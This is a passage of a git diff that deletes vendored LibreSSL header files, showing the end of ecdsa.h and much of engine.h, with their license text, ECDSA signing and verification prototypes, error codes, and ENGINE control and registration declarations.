- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-#ifndef HEADER_ECDSA_H
-#define HEADER_ECDSA_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_ECDSA
-#error ECDSA is disabled.
-#endif
-
-#include <openssl/ec.h>
-#include <openssl/ossl_typ.h>
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-typedef struct ECDSA_SIG_st ECDSA_SIG;
-
-struct ecdsa_method {
-	const char *name;
-	ECDSA_SIG *(*ecdsa_do_sign)(const unsigned char *dgst, int dgst_len,
-	    const BIGNUM *inv, const BIGNUM *rp, EC_KEY *eckey);
-	int (*ecdsa_sign_setup)(EC_KEY *eckey, BN_CTX *ctx, BIGNUM **kinv,
-	    BIGNUM **r);
-	int (*ecdsa_do_verify)(const unsigned char *dgst, int dgst_len,
-	    const ECDSA_SIG *sig, EC_KEY *eckey);
-#if 0
-	int (*init)(EC_KEY *eckey);
-	int (*finish)(EC_KEY *eckey);
-#endif
-	int flags;
-	char *app_data;
-};
-
-/* If this flag is set the ECDSA method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its responsibility
- * to ensure the result is compliant.
- */
-
-#define ECDSA_FLAG_FIPS_METHOD  0x1
-
-struct ECDSA_SIG_st {
-	BIGNUM *r;
-	BIGNUM *s;
-};
-
-/** Allocates and initialize a ECDSA_SIG structure
- *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
- */
-ECDSA_SIG *ECDSA_SIG_new(void);
-
-/** frees a ECDSA_SIG structure
- *  \param  sig  pointer to the ECDSA_SIG structure
- */
-void ECDSA_SIG_free(ECDSA_SIG *sig);
-
-/** DER encode content of ECDSA_SIG object (note: this function modifies *pp
- *  (*pp += length of the DER encoded signature)).
- *  \param  sig  pointer to the ECDSA_SIG object
- *  \param  pp   pointer to a unsigned char pointer for the output or NULL
- *  \return the length of the DER encoded ECDSA_SIG object or 0
- */
-int i2d_ECDSA_SIG(const ECDSA_SIG *sig, unsigned char **pp);
-
-/** Decodes a DER encoded ECDSA signature (note: this function changes *pp
- *  (*pp += len)).
- *  \param  sig  pointer to ECDSA_SIG pointer (may be NULL)
- *  \param  pp   memory buffer with the DER encoded signature
- *  \param  len  length of the buffer
- *  \return pointer to the decoded ECDSA_SIG structure (or NULL)
- */
-ECDSA_SIG *d2i_ECDSA_SIG(ECDSA_SIG **sig, const unsigned char **pp, long len);
-
-/** Computes the ECDSA signature of the given hash value using
- *  the supplied private key and returns the created signature.
- *  \param  dgst      pointer to the hash value
- *  \param  dgst_len  length of the hash value
- *  \param  eckey     EC_KEY object containing a private EC key
- *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
- */
-ECDSA_SIG *ECDSA_do_sign(const unsigned char *dgst, int dgst_len,
-    EC_KEY *eckey);
-
-/** Computes ECDSA signature of a given hash value using the supplied
- *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
- *  \param  dgst     pointer to the hash value to sign
- *  \param  dgstlen  length of the hash value
- *  \param  kinv     BIGNUM with a pre-computed inverse k (optional)
- *  \param  rp       BIGNUM with a pre-computed rp value (optioanl),
- *                   see ECDSA_sign_setup
- *  \param  eckey    EC_KEY object containing a private EC key
- *  \return pointer to a ECDSA_SIG structure or NULL if an error occurred
- */
-ECDSA_SIG *ECDSA_do_sign_ex(const unsigned char *dgst, int dgstlen,
-    const BIGNUM *kinv, const BIGNUM *rp, EC_KEY *eckey);
-
-/** Verifies that the supplied signature is a valid ECDSA
- *  signature of the supplied hash value using the supplied public key.
- *  \param  dgst      pointer to the hash value
- *  \param  dgst_len  length of the hash value
- *  \param  sig       ECDSA_SIG structure
- *  \param  eckey     EC_KEY object containing a public EC key
- *  \return 1 if the signature is valid, 0 if the signature is invalid
- *          and -1 on error
- */
-int ECDSA_do_verify(const unsigned char *dgst, int dgst_len,
-    const ECDSA_SIG *sig, EC_KEY* eckey);
-
-const ECDSA_METHOD *ECDSA_OpenSSL(void);
-
-/** Sets the default ECDSA method
- *  \param  meth  new default ECDSA_METHOD
- */
-void ECDSA_set_default_method(const ECDSA_METHOD *meth);
-
-/** Returns the default ECDSA method
- *  \return pointer to ECDSA_METHOD structure containing the default method
- */
-const ECDSA_METHOD *ECDSA_get_default_method(void);
-
-/** Sets method to be used for the ECDSA operations
- *  \param  eckey  EC_KEY object
- *  \param  meth   new method
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_set_method(EC_KEY *eckey, const ECDSA_METHOD *meth);
-
-/** Returns the maximum length of the DER encoded signature
- *  \param  eckey  EC_KEY object
- *  \return numbers of bytes required for the DER encoded signature
- */
-int ECDSA_size(const EC_KEY *eckey);
-
-/** Precompute parts of the signing operation
- *  \param  eckey  EC_KEY object containing a private EC key
- *  \param  ctx    BN_CTX object (optional)
- *  \param  kinv   BIGNUM pointer for the inverse of k
- *  \param  rp     BIGNUM pointer for x coordinate of k * generator
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_sign_setup(EC_KEY *eckey, BN_CTX *ctx, BIGNUM **kinv,
-    BIGNUM **rp);
-
-/** Computes ECDSA signature of a given hash value using the supplied
- *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
- *  \param  type     this parameter is ignored
- *  \param  dgst     pointer to the hash value to sign
- *  \param  dgstlen  length of the hash value
- *  \param  sig      memory for the DER encoded created signature
- *  \param  siglen   pointer to the length of the returned signature
- *  \param  eckey    EC_KEY object containing a private EC key
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_sign(int type, const unsigned char *dgst, int dgstlen,
-    unsigned char *sig, unsigned int *siglen, EC_KEY *eckey);
-
-
-/** Computes ECDSA signature of a given hash value using the supplied
- *  private key (note: sig must point to ECDSA_size(eckey) bytes of memory).
- *  \param  type     this parameter is ignored
- *  \param  dgst     pointer to the hash value to sign
- *  \param  dgstlen  length of the hash value
- *  \param  sig      buffer to hold the DER encoded signature
- *  \param  siglen   pointer to the length of the returned signature
- *  \param  kinv     BIGNUM with a pre-computed inverse k (optional)
- *  \param  rp       BIGNUM with a pre-computed rp value (optioanl),
- *                   see ECDSA_sign_setup
- *  \param  eckey    EC_KEY object containing a private EC key
- *  \return 1 on success and 0 otherwise
- */
-int ECDSA_sign_ex(int type, const unsigned char *dgst, int dgstlen,
-    unsigned char *sig, unsigned int *siglen, const BIGNUM *kinv,
-    const BIGNUM *rp, EC_KEY *eckey);
-
-/** Verifies that the given signature is valid ECDSA signature
- *  of the supplied hash value using the specified public key.
- *  \param  type     this parameter is ignored
- *  \param  dgst     pointer to the hash value
- *  \param  dgstlen  length of the hash value
- *  \param  sig      pointer to the DER encoded signature
- *  \param  siglen   length of the DER encoded signature
- *  \param  eckey    EC_KEY object containing a public EC key
- *  \return 1 if the signature is valid, 0 if the signature is invalid
- *          and -1 on error
- */
-int ECDSA_verify(int type, const unsigned char *dgst, int dgstlen,
-    const unsigned char *sig, int siglen, EC_KEY *eckey);
-
-/* the standard ex_data functions */
-int ECDSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int ECDSA_set_ex_data(EC_KEY *d, int idx, void *arg);
-void *ECDSA_get_ex_data(EC_KEY *d, int idx);
-
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ECDSA_strings(void);
-
-/* Error codes for the ECDSA functions. */
-
-/* Function codes. */
-#define ECDSA_F_ECDSA_CHECK				 104
-#define ECDSA_F_ECDSA_DATA_NEW_METHOD			 100
-#define ECDSA_F_ECDSA_DO_SIGN				 101
-#define ECDSA_F_ECDSA_DO_VERIFY				 102
-#define ECDSA_F_ECDSA_SIGN_SETUP			 103
-
-/* Reason codes. */
-#define ECDSA_R_BAD_SIGNATURE				 100
-#define ECDSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE		 101
-#define ECDSA_R_ERR_EC_LIB				 102
-#define ECDSA_R_MISSING_PARAMETERS			 103
-#define ECDSA_R_NEED_NEW_SETUP_VALUES			 106
-#define ECDSA_R_NON_FIPS_METHOD				 107
-#define ECDSA_R_RANDOM_NUMBER_GENERATION_FAILED		 104
-#define ECDSA_R_SIGNATURE_MALLOC_FAILED			 105
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/engine.h b/thirdparty/libressl/include/openssl/engine.h
deleted file mode 100644
index 30d1bde..0000000
--- a/thirdparty/libressl/include/openssl/engine.h
+++ /dev/null
@@ -1,807 +0,0 @@
-/* $OpenBSD: engine.h,v 1.31 2015/07/19 22:34:27 doug Exp $ */
-/* Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL
- * project 2000.
- */
-/* ====================================================================
- * Copyright (c) 1999-2004 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    licensing@OpenSSL.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECDH support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#ifndef HEADER_ENGINE_H
-#define HEADER_ENGINE_H
-
-#include <openssl/opensslconf.h>
-
-#ifdef OPENSSL_NO_ENGINE
-#error ENGINE is disabled.
-#endif
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/bn.h>
-#ifndef OPENSSL_NO_RSA
-#include <openssl/rsa.h>
-#endif
-#ifndef OPENSSL_NO_DSA
-#include <openssl/dsa.h>
-#endif
-#ifndef OPENSSL_NO_DH
-#include <openssl/dh.h>
-#endif
-#ifndef OPENSSL_NO_ECDH
-#include <openssl/ecdh.h>
-#endif
-#ifndef OPENSSL_NO_ECDSA
-#include <openssl/ecdsa.h>
-#endif
-#include <openssl/ui.h>
-#include <openssl/err.h>
-#endif
-
-#include <openssl/ossl_typ.h>
-
-#include <openssl/x509.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* These flags are used to control combinations of algorithm (methods)
- * by bitwise "OR"ing. */
-#define ENGINE_METHOD_RSA		(unsigned int)0x0001
-#define ENGINE_METHOD_DSA		(unsigned int)0x0002
-#define ENGINE_METHOD_DH		(unsigned int)0x0004
-#define ENGINE_METHOD_RAND		(unsigned int)0x0008
-#define ENGINE_METHOD_ECDH		(unsigned int)0x0010
-#define ENGINE_METHOD_ECDSA		(unsigned int)0x0020
-#define ENGINE_METHOD_CIPHERS		(unsigned int)0x0040
-#define ENGINE_METHOD_DIGESTS		(unsigned int)0x0080
-#define ENGINE_METHOD_STORE		(unsigned int)0x0100
-#define ENGINE_METHOD_PKEY_METHS	(unsigned int)0x0200
-#define ENGINE_METHOD_PKEY_ASN1_METHS	(unsigned int)0x0400
-/* Obvious all-or-nothing cases. */
-#define ENGINE_METHOD_ALL		(unsigned int)0xFFFF
-#define ENGINE_METHOD_NONE		(unsigned int)0x0000
-
-/* This(ese) flag(s) controls behaviour of the ENGINE_TABLE mechanism used
- * internally to control registration of ENGINE implementations, and can be set
- * by ENGINE_set_table_flags(). The "NOINIT" flag prevents attempts to
- * initialise registered ENGINEs if they are not already initialised. */
-#define ENGINE_TABLE_FLAG_NOINIT	(unsigned int)0x0001
-
-/* ENGINE flags that can be set by ENGINE_set_flags(). */
-/* #define ENGINE_FLAGS_MALLOCED	0x0001 */ /* Not used */
-
-/* This flag is for ENGINEs that wish to handle the various 'CMD'-related
- * control commands on their own. Without this flag, ENGINE_ctrl() handles these
- * control commands on behalf of the ENGINE using their "cmd_defns" data. */
-#define ENGINE_FLAGS_MANUAL_CMD_CTRL	(int)0x0002
-
-/* This flag is for ENGINEs who return new duplicate structures when found via
- * "ENGINE_by_id()". When an ENGINE must store state (eg. if ENGINE_ctrl()
- * commands are called in sequence as part of some stateful process like
- * key-generation setup and execution), it can set this flag - then each attempt
- * to obtain the ENGINE will result in it being copied into a new structure.
- * Normally, ENGINEs don't declare this flag so ENGINE_by_id() just increments
- * the existing ENGINE's structural reference count. */
-#define ENGINE_FLAGS_BY_ID_COPY		(int)0x0004
-
-/* This flag if for an ENGINE that does not want its methods registered as
- * part of ENGINE_register_all_complete() for example if the methods are
- * not usable as default methods.
- */
-
-#define ENGINE_FLAGS_NO_REGISTER_ALL	(int)0x0008
-
-/* ENGINEs can support their own command types, and these flags are used in
- * ENGINE_CTRL_GET_CMD_FLAGS to indicate to the caller what kind of input each
- * command expects. Currently only numeric and string input is supported. If a
- * control command supports none of the _NUMERIC, _STRING, or _NO_INPUT options,
- * then it is regarded as an "internal" control command - and not for use in
- * config setting situations. As such, they're not available to the
- * ENGINE_ctrl_cmd_string() function, only raw ENGINE_ctrl() access. Changes to
- * this list of 'command types' should be reflected carefully in
- * ENGINE_cmd_is_executable() and ENGINE_ctrl_cmd_string(). */
-
-/* accepts a 'long' input value (3rd parameter to ENGINE_ctrl) */
-#define ENGINE_CMD_FLAG_NUMERIC		(unsigned int)0x0001
-/* accepts string input (cast from 'void*' to 'const char *', 4th parameter to
- * ENGINE_ctrl) */
-#define ENGINE_CMD_FLAG_STRING		(unsigned int)0x0002
-/* Indicates that the control command takes *no* input. Ie. the control command
- * is unparameterised. */
-#define ENGINE_CMD_FLAG_NO_INPUT	(unsigned int)0x0004
-/* Indicates that the control command is internal. This control command won't
- * be shown in any output, and is only usable through the ENGINE_ctrl_cmd()
- * function. */
-#define ENGINE_CMD_FLAG_INTERNAL	(unsigned int)0x0008
-
-/* NB: These 3 control commands are deprecated and should not be used. ENGINEs
- * relying on these commands should compile conditional support for
- * compatibility (eg. if these symbols are defined) but should also migrate the
- * same functionality to their own ENGINE-specific control functions that can be
- * "discovered" by calling applications. The fact these control commands
- * wouldn't be "executable" (ie. usable by text-based config) doesn't change the
- * fact that application code can find and use them without requiring per-ENGINE
- * hacking. */
-
-/* These flags are used to tell the ctrl function what should be done.
- * All command numbers are shared between all engines, even if some don't
- * make sense to some engines.  In such a case, they do nothing but return
- * the error ENGINE_R_CTRL_COMMAND_NOT_IMPLEMENTED. */
-#define ENGINE_CTRL_SET_LOGSTREAM		1
-#define ENGINE_CTRL_SET_PASSWORD_CALLBACK	2
-#define ENGINE_CTRL_HUP				3 /* Close and reinitialise any
-						     handles/connections etc. */
-#define ENGINE_CTRL_SET_USER_INTERFACE          4 /* Alternative to callback */
-#define ENGINE_CTRL_SET_CALLBACK_DATA           5 /* User-specific data, used
-						     when calling the password
-						     callback and the user
-						     interface */
-#define ENGINE_CTRL_LOAD_CONFIGURATION		6 /* Load a configuration, given
-						     a string that represents a
-						     file name or so */
-#define ENGINE_CTRL_LOAD_SECTION		7 /* Load data from a given
-						     section in the already loaded
-						     configuration */
-
-/* These control commands allow an application to deal with an arbitrary engine
- * in a dynamic way. Warn: Negative return values indicate errors FOR THESE
- * COMMANDS because zero is used to indicate 'end-of-list'. Other commands,
- * including ENGINE-specific command types, return zero for an error.
- *
- * An ENGINE can choose to implement these ctrl functions, and can internally
- * manage things however it chooses - it does so by setting the
- * ENGINE_FLAGS_MANUAL_CMD_CTRL flag (using ENGINE_set_flags()). Otherwise the
- * ENGINE_ctrl() code handles this on the ENGINE's behalf using the cmd_defns
- * data (set using ENGINE_set_cmd_defns()). This means an ENGINE's ctrl()
- * handler need only implement its own commands - the above "meta" commands will
- * be taken care of. */
-
-/* Returns non-zero if the supplied ENGINE has a ctrl() handler. If "not", then
- * all the remaining control commands will return failure, so it is worth
- * checking this first if the caller is trying to "discover" the engine's
- * capabilities and doesn't want errors generated unnecessarily. */
-#define ENGINE_CTRL_HAS_CTRL_FUNCTION		10
-/* Returns a positive command number for the first command supported by the
- * engine. Returns zero if no ctrl commands are supported. */
-#define ENGINE_CTRL_GET_FIRST_CMD_TYPE		11
-/* The 'long' argument specifies a command implemented by the engine, and the
- * return value is the next command supported, or zero if there are no more. */
-#define ENGINE_CTRL_GET_NEXT_CMD_TYPE		12
-/* The 'void*' argument is a command name (cast from 'const char *'), and the
- * return value is the command that corresponds to it. */
-#define ENGINE_CTRL_GET_CMD_FROM_NAME		13
-/* The next two allow a command to be converted into its corresponding string
- * form. In each case, the 'long' argument supplies the command. In the NAME_LEN
- * case, the return value is the length of the command name (not counting a
- * trailing EOL). In the NAME case, the 'void*' argument must be a string buffer
- * large enough, and it will be populated with the name of the command (WITH a
- * trailing EOL). */
-#define ENGINE_CTRL_GET_NAME_LEN_FROM_CMD	14
-#define ENGINE_CTRL_GET_NAME_FROM_CMD		15
-/* The next two are similar but give a "short description" of a command. */
-#define ENGINE_CTRL_GET_DESC_LEN_FROM_CMD	16
-#define ENGINE_CTRL_GET_DESC_FROM_CMD		17
-/* With this command, the return value is the OR'd combination of
- * ENGINE_CMD_FLAG_*** values that indicate what kind of input a given
- * engine-specific ctrl command expects. */
-#define ENGINE_CTRL_GET_CMD_FLAGS		18
-
-/* ENGINE implementations should start the numbering of their own control
- * commands from this value. (ie. ENGINE_CMD_BASE, ENGINE_CMD_BASE + 1, etc). */
-#define ENGINE_CMD_BASE				200
-
-/* If an ENGINE supports its own specific control commands and wishes the
- * framework to handle the above 'ENGINE_CMD_***'-manipulation commands on its
- * behalf, it should supply a null-terminated array of ENGINE_CMD_DEFN entries
- * to ENGINE_set_cmd_defns(). It should also implement a ctrl() handler that
- * supports the stated commands (ie. the "cmd_num" entries as described by the
- * array). NB: The array must be ordered in increasing order of cmd_num.
- * "null-terminated" means that the last ENGINE_CMD_DEFN element has cmd_num set
- * to zero and/or cmd_name set to NULL. */
-typedef struct ENGINE_CMD_DEFN_st {
-	unsigned int cmd_num; /* The command number */
-	const char *cmd_name; /* The command name itself */
-	const char *cmd_desc; /* A short description of the command */
-	unsigned int cmd_flags; /* The input the command expects */
-} ENGINE_CMD_DEFN;
-
-/* Generic function pointer */
-typedef int (*ENGINE_GEN_FUNC_PTR)(void);
-/* Generic function pointer taking no arguments */
-typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *);
-/* Specific control function pointer */
-typedef int (*ENGINE_CTRL_FUNC_PTR)(ENGINE *, int, long, void *,
-    void (*f)(void));
-/* Generic load_key function pointer */
-typedef EVP_PKEY * (*ENGINE_LOAD_KEY_PTR)(ENGINE *, const char *,
-    UI_METHOD *ui_method, void *callback_data);
-typedef int (*ENGINE_SSL_CLIENT_CERT_PTR)(ENGINE *, SSL *ssl,
-    STACK_OF(X509_NAME) *ca_dn, X509 **pcert, EVP_PKEY **pkey,
-    STACK_OF(X509) **pother, UI_METHOD *ui_method, void *callback_data);
-
-/* These callback types are for an ENGINE's handler for cipher and digest logic.
- * These handlers have these prototypes;
- *   int foo(ENGINE *e, const EVP_CIPHER **cipher, const int **nids, int nid);
- *   int foo(ENGINE *e, const EVP_MD **digest, const int **nids, int nid);
- * Looking at how to implement these handlers in the case of cipher support, if
- * the framework wants the EVP_CIPHER for 'nid', it will call;
- *   foo(e, &p_evp_cipher, NULL, nid);    (return zero for failure)
- * If the framework wants a list of supported 'nid's, it will call;
- *   foo(e, NULL, &p_nids, 0); (returns number of 'nids' or -1 for error)
- */
-/* Returns to a pointer to the array of supported cipher 'nid's. If the second
- * parameter is non-NULL it is set to the size of the returned array. */
-typedef int (*ENGINE_CIPHERS_PTR)(ENGINE *, const EVP_CIPHER **,
-    const int **, int);
-typedef int (*ENGINE_DIGESTS_PTR)(ENGINE *, const EVP_MD **, const int **, int);
-typedef int (*ENGINE_PKEY_METHS_PTR)(ENGINE *, EVP_PKEY_METHOD **,
-    const int **, int);
-typedef int (*ENGINE_PKEY_ASN1_METHS_PTR)(ENGINE *, EVP_PKEY_ASN1_METHOD **,
-    const int **, int);
-
-/* STRUCTURE functions ... all of these functions deal with pointers to ENGINE
- * structures where the pointers have a "structural reference". This means that
- * their reference is to allowed access to the structure but it does not imply
- * that the structure is functional. To simply increment or decrement the
- * structural reference count, use ENGINE_by_id and ENGINE_free. NB: This is not
- * required when iterating using ENGINE_get_next as it will automatically
- * decrement the structural reference count of the "current" ENGINE and
- * increment the structural reference count of the ENGINE it returns (unless it
- * is NULL). */
-
-/* Get the first/last "ENGINE" type available. */
-ENGINE *ENGINE_get_first(void);
-ENGINE *ENGINE_get_last(void);
-/* Iterate to the next/previous "ENGINE" type (NULL = end of the list). */
-ENGINE *ENGINE_get_next(ENGINE *e);
-ENGINE *ENGINE_get_prev(ENGINE *e);
-/* Add another "ENGINE" type into the array. */
-int ENGINE_add(ENGINE *e);
-/* Remove an existing "ENGINE" type from the array. */
-int ENGINE_remove(ENGINE *e);
-/* Retrieve an engine from the list by its unique "id" value. */
-ENGINE *ENGINE_by_id(const char *id);
-/* Add all the built-in engines. */
-void ENGINE_load_openssl(void);
-void ENGINE_load_dynamic(void);
-#ifndef OPENSSL_NO_STATIC_ENGINE
-void ENGINE_load_padlock(void);
-#endif
-void ENGINE_load_builtin_engines(void);
-
-/* Get and set global flags (ENGINE_TABLE_FLAG_***) for the implementation
- * "registry" handling. */
-unsigned int ENGINE_get_table_flags(void);
-void ENGINE_set_table_flags(unsigned int flags);
-
-/* Manage registration of ENGINEs per "table". For each type, there are 3
- * functions;
- *   ENGINE_register_***(e) - registers the implementation from 'e' (if it has one)
- *   ENGINE_unregister_***(e) - unregister the implementation from 'e'
- *   ENGINE_register_all_***() - call ENGINE_register_***() for each 'e' in the list
- * Cleanup is automatically registered from each table when required, so
- * ENGINE_cleanup() will reverse any "register" operations. */
-
-int ENGINE_register_RSA(ENGINE *e);
-void ENGINE_unregister_RSA(ENGINE *e);
-void ENGINE_register_all_RSA(void);
-
-int ENGINE_register_DSA(ENGINE *e);
-void ENGINE_unregister_DSA(ENGINE *e);
-void ENGINE_register_all_DSA(void);
-
-int ENGINE_register_ECDH(ENGINE *e);
-void ENGINE_unregister_ECDH(ENGINE *e);
-void ENGINE_register_all_ECDH(void);
-
-int ENGINE_register_ECDSA(ENGINE *e);
-void ENGINE_unregister_ECDSA(ENGINE *e);
-void ENGINE_register_all_ECDSA(void);
-
-int ENGINE_register_DH(ENGINE *e);
-void ENGINE_unregister_DH(ENGINE *e);
-void ENGINE_register_all_DH(void);
-
-int ENGINE_register_RAND(ENGINE *e);
-void ENGINE_unregister_RAND(ENGINE *e);
-void ENGINE_register_all_RAND(void);
-
-int ENGINE_register_STORE(ENGINE *e);
-void ENGINE_unregister_STORE(ENGINE *e);
-void ENGINE_register_all_STORE(void);
-
-int ENGINE_register_ciphers(ENGINE *e);
-void ENGINE_unregister_ciphers(ENGINE *e);
-void ENGINE_register_all_ciphers(void);
-
-int ENGINE_register_digests(ENGINE *e);
-void ENGINE_unregister_digests(ENGINE *e);
-void ENGINE_register_all_digests(void);
-
-int ENGINE_register_pkey_meths(ENGINE *e);
-void ENGINE_unregister_pkey_meths(ENGINE *e);
-void ENGINE_register_all_pkey_meths(void);
-
-int ENGINE_register_pkey_asn1_meths(ENGINE *e);
-void ENGINE_unregister_pkey_asn1_meths(ENGINE *e);
-void ENGINE_register_all_pkey_asn1_meths(void);
-
-/* These functions register all support from the above categories. Note, use of
- * these functions can result in static linkage of code your application may not
- * need. If you only need a subset of functionality, consider using more
- * selective initialisation. */
-int ENGINE_register_complete(ENGINE *e);
-int ENGINE_register_all_complete(void);
-
-/* Send parametrised control commands to the engine. The possibilities to send
- * down an integer, a pointer to data or a function pointer are provided. Any of
- * the parameters may or may not be NULL, depending on the command number. In
- * actuality, this function only requires a structural (rather than functional)
- * reference to an engine, but many control commands may require the engine be
- * functional. The caller should be aware of trying commands that require an
- * operational ENGINE, and only use functional references in such situations. */
-int ENGINE_ctrl(ENGINE *e, int cmd, long i, void *p, void (*f)(void));
-
-/* This function tests if an ENGINE-specific command is usable as a "setting".
- * Eg. in an application's config file that gets processed through
- * ENGINE_ctrl_cmd_string(). If this returns zero, it is not available to
- * ENGINE_ctrl_cmd_string(), only ENGINE_ctrl(). */
-int ENGINE_cmd_is_executable(ENGINE *e, int cmd);
-
-/* This function works like ENGINE_ctrl() with the exception of taking a
- * command name instead of a command number, and can handle optional commands.
- * See the comment on ENGINE_ctrl_cmd_string() for an explanation on how to
- * use the cmd_name and cmd_optional. */
-int ENGINE_ctrl_cmd(ENGINE *e, const char *cmd_name,
-    long i, void *p, void (*f)(void), int cmd_optional);
-
-/* This function passes a command-name and argument to an ENGINE. The cmd_name
- * is converted to a command number and the control command is called using
- * 'arg' as an argument (unless the ENGINE doesn't support such a command, in
- * which case no control command is called). The command is checked for input
- * flags, and if necessary the argument will be converted to a numeric value. If
- * cmd_optional is non-zero, then if the ENGINE doesn't support the given
- * cmd_name the return value will be success anyway. This function is intended
- * for applications to use so that users (or config files) can supply
- * engine-specific config data to the ENGINE at run-time to control behaviour of
- * specific engines. As such, it shouldn't be used for calling ENGINE_ctrl()
- * functions that return data, deal with binary data, or that are otherwise
- * supposed to be used directly through ENGINE_ctrl() in application code. Any
- * "return" data from an ENGINE_ctrl() operation in this function will be lost -
- * the return value is interpreted as failure if the return value is zero,
- * success otherwise, and this function returns a boolean value as a result. In
- * other words, vendors of 'ENGINE'-enabled devices should write ENGINE
- * implementations with parameterisations that work in this scheme, so that
- * compliant ENGINE-based applications can work consistently with the same
- * configuration for the same ENGINE-enabled devices, across applications. */
-int ENGINE_ctrl_cmd_string(ENGINE *e, const char *cmd_name, const char *arg,
-    int cmd_optional);
-
-/* These functions are useful for manufacturing new ENGINE structures. They
- * don't address reference counting at all - one uses them to populate an ENGINE
- * structure with personalised implementations of things prior to using it
- * directly or adding it to the builtin ENGINE list in OpenSSL. These are also
- * here so that the ENGINE structure doesn't have to be exposed and break binary
- * compatibility! */
-ENGINE *ENGINE_new(void);
-int ENGINE_free(ENGINE *e);
-int ENGINE_up_ref(ENGINE *e);
-int ENGINE_set_id(ENGINE *e, const char *id);
-int ENGINE_set_name(ENGINE *e, const char *name);
-int ENGINE_set_RSA(ENGINE *e, const RSA_METHOD *rsa_meth);
-int ENGINE_set_DSA(ENGINE *e, const DSA_METHOD *dsa_meth);
-int ENGINE_set_ECDH(ENGINE *e, const ECDH_METHOD *ecdh_meth);
-int ENGINE_set_ECDSA(ENGINE *e, const ECDSA_METHOD *ecdsa_meth);
-int ENGINE_set_DH(ENGINE *e, const DH_METHOD *dh_meth);
-int ENGINE_set_RAND(ENGINE *e, const RAND_METHOD *rand_meth);
-int ENGINE_set_STORE(ENGINE *e, const STORE_METHOD *store_meth);
-int ENGINE_set_destroy_function(ENGINE *e, ENGINE_GEN_INT_FUNC_PTR destroy_f);
